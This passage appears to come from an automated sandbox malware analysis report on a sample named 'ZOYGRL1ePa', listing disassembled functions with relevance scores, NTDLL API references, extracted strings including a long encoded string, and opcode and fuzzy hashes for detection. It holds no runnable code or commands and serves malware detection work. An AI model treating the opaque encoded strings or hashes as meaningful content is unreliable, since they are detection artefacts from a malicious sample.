Opcode Fuzzy Hash: 9911485cf649f489cf8488be02afa69d0bf569cc45a742220694f48d3081005c
Instruction Fuzzy Hash: 52D1A230B003198FCB48EBB9D8986ADB7B6FF88705F249519E415EB394DB35E891CB41

Function 06E7C830 Relevance: 1.8, APIs: 1, Instructions: 330libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06E7C894

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc708438fb532713b8e64f16de8b03391dcb9b95ec3c62779ce49550eca3b3a1
Instruction ID: a96a11473a49c9a6a7e1b04753d0046e6401d067382bdb6628bff2f7135bd635
Opcode Fuzzy Hash: cc708438fb532713b8e64f16de8b03391dcb9b95ec3c62779ce49550eca3b3a1
Instruction Fuzzy Hash: 50D19030B003098FCB48DBB9D8986ADB7B6FF88705F24951AE415EB394DB35D891CB41

Function 06E7AEE0 Relevance: 1.7, APIs: 1, Instructions: 175libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06E7AF1F

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0a42c026b9ef848398a6a2204f894b89f9b187bc4a4751e7e076c0d88a0d78f
Instruction ID: 03c7e4d94f5dc823910cdd83eccc3432395fe51d662732bd9eb83141d951bcba
Opcode Fuzzy Hash: f0a42c026b9ef848398a6a2204f894b89f9b187bc4a4751e7e076c0d88a0d78f
Instruction Fuzzy Hash: 65614F30A10309DFDB48EF68D594BAEBBB2EF88304F108529E402A7394EF759945CB90

Function 013B7CE8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\V#n, xrefs: 013B7F33

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: \V#n
API String ID: 0-3691841082
Opcode ID: 706f83e996bd9a3042791b7b5e16999e6d9c6a681645458f09088847eac8a6a5
Instruction ID: d32aa26e4ea6aa4001386d3a095e9f924f25b371d29f8740e8902bcc3027d2af
Opcode Fuzzy Hash: 706f83e996bd9a3042791b7b5e16999e6d9c6a681645458f09088847eac8a6a5
Instruction Fuzzy Hash: 5B916F71E00209DFDF14CFA9C9817DEBBF2EF88318F148129E509AB694EB349945CB95

Function 06E75848 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

LR^q, xrefs: 06E75960

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 8a26dafa413831c1a241eda83b095c3b86584a874c0b24709e0a4bb919ab6bb6
Instruction ID: e1bacb021ba4010748f5891d108e13a1a366619f9cb144d17a1924460ed6995d
Opcode Fuzzy Hash: 8a26dafa413831c1a241eda83b095c3b86584a874c0b24709e0a4bb919ab6bb6
Instruction Fuzzy Hash: A1A1C174E00219CFDB54DFA9C884BEEBBF6BF88304F2090A9D419AB255DB709945CF64

Function 06E75839 Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

LR^q, xrefs: 06E75960

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: a0216e7780d0a7d87969760fda0d9222118637c6411db0185f98ee318afe1235
Instruction ID: 79200bae6e2033b47a142eb82a5744cc5d6c73f171be2a62ca3dbe0f3c0ed201
Opcode Fuzzy Hash: a0216e7780d0a7d87969760fda0d9222118637c6411db0185f98ee318afe1235
Instruction Fuzzy Hash: 1091F574E00219CFDB58DFA9C884BEEBBF6BF88304F20906AD419AB255DB745945CF60

Function 0711A1FF Relevance: 1.1, Instructions: 1073COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4123264943.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32340d6c06fc83d376566ee95a1db137c06783d61fb951a78ba596e4b30ede60
Instruction ID: 79c2dc26718915a30f2a772907f2edfebdbc2311e62d91d464c21ef07bab77da
Opcode Fuzzy Hash: 32340d6c06fc83d376566ee95a1db137c06783d61fb951a78ba596e4b30ede60
Instruction Fuzzy Hash: 2AC20A71D107198ECB15EF68C8446A9F7F1FF99300F15D6AAD459AB224EB30AAC4CF81

Function 06E7E2D0 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef388cf76d0a2c8a971e46334cf651ae9368389f345af45f0670c5f0dbcf18a
Instruction ID: 1d31d4679c691b5a886dd52b5d07f50b50b1a3721fce87fe4dc0713b79befc62
Opcode Fuzzy Hash: 9ef388cf76d0a2c8a971e46334cf651ae9368389f345af45f0670c5f0dbcf18a
Instruction Fuzzy Hash: 4EE16E30F002099FDB44EFB8D994A5EB7B2AF84314F2495A5D815DB3A9DB31EC42CB81

Function 06FCBA91 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6387c7f924c32539230e751b769f11c7c8fcdefe2047e9e9c0a05848d95b6c1a
Instruction ID: 1f724cfe427db38ae86d77894e9b8b660b147a40359fc466ea66ead48c1a75ff
Opcode Fuzzy Hash: 6387c7f924c32539230e751b769f11c7c8fcdefe2047e9e9c0a05848d95b6c1a
Instruction Fuzzy Hash: D9D15F34E0020ACFDB54DFA9CA49BADBBF1BF84724F158158E505AF2A5DB70E945CB80

Function 013B8900 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f4741b5eae45a0da462ef7c26b9ea2901248ca56611526e213373f02884fba
Instruction ID: ea5c55f59d7ca9cea050b48c81ee522291bbc7380d62cee1b9fd106be3e71d85
Opcode Fuzzy Hash: f2f4741b5eae45a0da462ef7c26b9ea2901248ca56611526e213373f02884fba
Instruction Fuzzy Hash: 25B15070E002098FEF14CFA9D8C17DEBBF6AF88318F188569D515E7694EB749885CB81

Function 013BEB37 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b6b615278551ffc25ec1fffbc70aff1c74772cd60c3e3eb983c2ce1d897aaa
Instruction ID: cc19212ee318405eebf9e6dd7552d305dbd315dda1b3cb1930f25314081aacf8
Opcode Fuzzy Hash: f7b6b615278551ffc25ec1fffbc70aff1c74772cd60c3e3eb983c2ce1d897aaa
Instruction Fuzzy Hash: 86A1B535E0021ACFCB01DFA8D884ADDFBBAFF89314F148615E519AF6A5EB309945CB50

Function 06E74D60 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b48f0c29a606a6059b40b72e929e1859a3d57fd5583d81bd94b9586afdea6eb6
Instruction ID: 0867056553ddd07a780e06fd29a7402ea4b7ce93080133077a1a7f3e04e44583
Opcode Fuzzy Hash: b48f0c29a606a6059b40b72e929e1859a3d57fd5583d81bd94b9586afdea6eb6
Instruction Fuzzy Hash: 2A51F8B0D00219CFDB68CF66D9447DEBBF2AF88305F14D0AAD418A7254EB740A85CF40

Function 06E74D50 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6137a0f7dc58c8dc07f39828ebe4d83b8ffeb52620cc00fafabefaf6278041ef
Instruction ID: 4502ba1d6413d4c9880a09d3e78bdb08b9a89270d091350d72fb835e9482a36e
Opcode Fuzzy Hash: 6137a0f7dc58c8dc07f39828ebe4d83b8ffeb52620cc00fafabefaf6278041ef
Instruction Fuzzy Hash: B741DBB1D00619CBDB68CF6AC9457DEFBF2AF88304F14C0AA9559A7254EB740A86CF40

Function 071151CB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 247libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07115215
LdrInitializeThunk.NTDLL ref: 071152CA

Strings

PH^q, xrefs: 071157FA
PH^q, xrefs: 0711580E

Memory Dump Source

Source File: 00000000.00000002.4123264943.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID: PH^q$PH^q
API String ID: 2994545307-1598597984
Opcode ID: 7d155505cb1312fb8f0e4fec759528c3d6930c3590de1fe642be74e86a36430c
Instruction ID: 1be6078a50abb9b162c3008d286bbb8e90b9c932bb0eebb4d23b5e0601c15556
Opcode Fuzzy Hash: 7d155505cb1312fb8f0e4fec759528c3d6930c3590de1fe642be74e86a36430c
Instruction Fuzzy Hash: FEA13E74B012298FDB18AB25DC9876E7BB2FF84700F1085A9E419A7398DF359D91CF80

Function 071151C2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07115215
LdrInitializeThunk.NTDLL ref: 071152CA

Strings

PH^q, xrefs: 071157FA
PH^q, xrefs: 0711580E

Memory Dump Source

Source File: 00000000.00000002.4123264943.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID: PH^q$PH^q
API String ID: 2994545307-1598597984
Opcode ID: 59a0e5e90ca397872d2ff5cabe45df789685b580e830f27b17c69ac56f4f2a88
Instruction ID: e4a7c086d6efdc1130e00db4747ad0b03ae54ba972337b355808188284529a4c
Opcode Fuzzy Hash: 59a0e5e90ca397872d2ff5cabe45df789685b580e830f27b17c69ac56f4f2a88
Instruction Fuzzy Hash: 7AA12C74B012298FDB19AB25DC9476E7BB2FB84700F1085A9E819A7398DF359D91CF80

Function 06E799E8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 417
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06E79E57

Strings

LR^q, xrefs: 06E79EF3
LR^q, xrefs: 06E79E8E

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID: LR^q$LR^q
API String ID: 2994545307-4089051495
Opcode ID: aceb133dd41df0e24524bacc95b43b8576f0cec84765a9c7deef8b1ac1bd8f16
Instruction ID: ac02434628b665171aa4012f90b6fb8f31ba667acd4316af5abf40172b97fc34
Opcode Fuzzy Hash: aceb133dd41df0e24524bacc95b43b8576f0cec84765a9c7deef8b1ac1bd8f16
Instruction Fuzzy Hash: D5F14F30B002099FCB48EF78D594AAEBBF2FF84304F248569E5069B395DF359842CB95

Function 0132E0C8 Relevance: 2.8, Strings: 2, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo, xrefs: 0132E2E0, 0132E323
SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO$W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo
API String ID: 0-1253232087
Opcode ID: 2e52c4b134e3948b01f21a2ee1a8b57bd192dc1e2736b63ffc49ccc3a417ef5e
Instruction ID: 051514c1957022615a1ec082ef0b5d754bec299c993fa9c94bd9fbb4c147c586
Opcode Fuzzy Hash: 2e52c4b134e3948b01f21a2ee1a8b57bd192dc1e2736b63ffc49ccc3a417ef5e
Instruction Fuzzy Hash: EE713A7254E3D19FD7039B28D8A57D67F70AF13228F1E81E7C485CE2A3D2298856C762

Function 0132E120 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo, xrefs: 0132E2E0, 0132E323
SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO$W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo
API String ID: 0-1253232087
Opcode ID: 2f2e58ed376d970f00c76a0aea3d2c0eb2e9f96632608ccb490915624f24d130
Instruction ID: a0b16be187f1f3172d75436f7dc45650c5c09c04b94db37359841972ea38ca65
Opcode Fuzzy Hash: 2f2e58ed376d970f00c76a0aea3d2c0eb2e9f96632608ccb490915624f24d130
Instruction Fuzzy Hash: 6A61497244D3919FD7039B28D8A67D67F70EF13228F1E81E7C485CE2A3D2698856C762

Function 0132E148 Relevance: 2.7, Strings: 2, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo, xrefs: 0132E2E0, 0132E323
SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO$W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo
API String ID: 0-1253232087
Opcode ID: 6053773f458af8a8cf635017e7b26c6f684f788220d35ece16828a03d59f0f0d
Instruction ID: dfb594694f875bb4a25388740918c31faaba39c3cdfe7dae4d3e248e45e190c7
Opcode Fuzzy Hash: 6053773f458af8a8cf635017e7b26c6f684f788220d35ece16828a03d59f0f0d
Instruction Fuzzy Hash: BC514B7244D3D19FD7039B28D8A57D67F70EF13228F1A81EBC485CE2A3D2698856C762

Function 0132E1A8 Relevance: 2.7, Strings: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo, xrefs: 0132E2E0, 0132E323
SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO$W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo
API String ID: 0-1253232087
Opcode ID: ccfe33df2fdcdd2a13231e7bf3a84dea1c6c6d8e079b7e30385af000c285cd71
Instruction ID: 92e11a56ea36d937c8a83ca8e9236285a0799d1d78b828623572d2ecfe432a47
Opcode Fuzzy Hash: ccfe33df2fdcdd2a13231e7bf3a84dea1c6c6d8e079b7e30385af000c285cd71
Instruction Fuzzy Hash: B4513A7254D3D09FC7039B28D8A57967F70AF13224F1A81EBC485CE2A3D229884AC762

Function 0132E1C8 Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo, xrefs: 0132E2E0, 0132E323
SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO$W93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoOo
API String ID: 0-1253232087
Opcode ID: 29933fbe3822e81f3ee0a3a875d2cb5686c7e6bdccd92046289c1dfc26f683aa
Instruction ID: 00770833db9ae24ef857744fd77c768885e002d67ea2e3286950f0d4b02db7b7
Opcode Fuzzy Hash: 29933fbe3822e81f3ee0a3a875d2cb5686c7e6bdccd92046289c1dfc26f683aa
Instruction Fuzzy Hash: CF514A7254D3D09FC7139B28D8A57967F70AF13224F1A81EBC485CE2A7D269884AC762

Function 0132D915 Relevance: 2.4, Strings: 1, Instructions: 1165COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 0f77157cc0edf38687ad716aab97217040765eeb5d0b4ee988e0e1835914ae88
Instruction ID: c6ce7cbf30ca5a8fe43a855c215f151cde160312519009f2dcbf2bc5213514bb
Opcode Fuzzy Hash: 0f77157cc0edf38687ad716aab97217040765eeb5d0b4ee988e0e1835914ae88
Instruction Fuzzy Hash: 2E420B7254E3D19FC3439B78D8A56D27FB09F13228B0E80E7C0C5CA5A7E25D985AC762

Function 0132D974 Relevance: 2.3, Strings: 1, Instructions: 1094COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 6995fb0cab4212eaede81ac059d0bf38cb2717b59f73fa00285b645baae91690
Instruction ID: 12b70a12b690304776c5e090e18a10823b991ffdcf1c2125ac04b8788880e594
Opcode Fuzzy Hash: 6995fb0cab4212eaede81ac059d0bf38cb2717b59f73fa00285b645baae91690
Instruction Fuzzy Hash: 9332FD7254E3D19FD3039B78D8A56D27FB09F13228B0E80E7C0C5CA5A7E25D985AC762

Function 0132D9A2 Relevance: 2.3, Strings: 1, Instructions: 1093COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: f3242198fa23d026c5b0bd87600f475d90f98872513a772d11850aa24937e41b
Instruction ID: fe9df9e0efbf193dff5f57f680d735461de19c7d3790f8ab445902a215f5ec6e
Opcode Fuzzy Hash: f3242198fa23d026c5b0bd87600f475d90f98872513a772d11850aa24937e41b
Instruction Fuzzy Hash: 6A32FD7254E3D19FD3039B78D8A56D27FB09F13228B0E80E7C0C5CA5A7D15D985AC762

Function 0132D9E8 Relevance: 2.3, Strings: 1, Instructions: 1066COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 29bcf848168094baf4792b1ed3d29a5506e2bd3f6246302f301dfb5d9cdffff1
Instruction ID: 407d5b213e0534e62ca76dd01510fbc8b5d5c7a21c355b1c94e2fddc1f297456
Opcode Fuzzy Hash: 29bcf848168094baf4792b1ed3d29a5506e2bd3f6246302f301dfb5d9cdffff1
Instruction Fuzzy Hash: FA32FC7254E3D19FD3039B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7E25D9856C762

Function 0132DA48 Relevance: 2.3, Strings: 1, Instructions: 1024COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: eb48b53b9f5a31db4d135a435253886ce9eb10307ba5842a19a9bd9d0abbea18
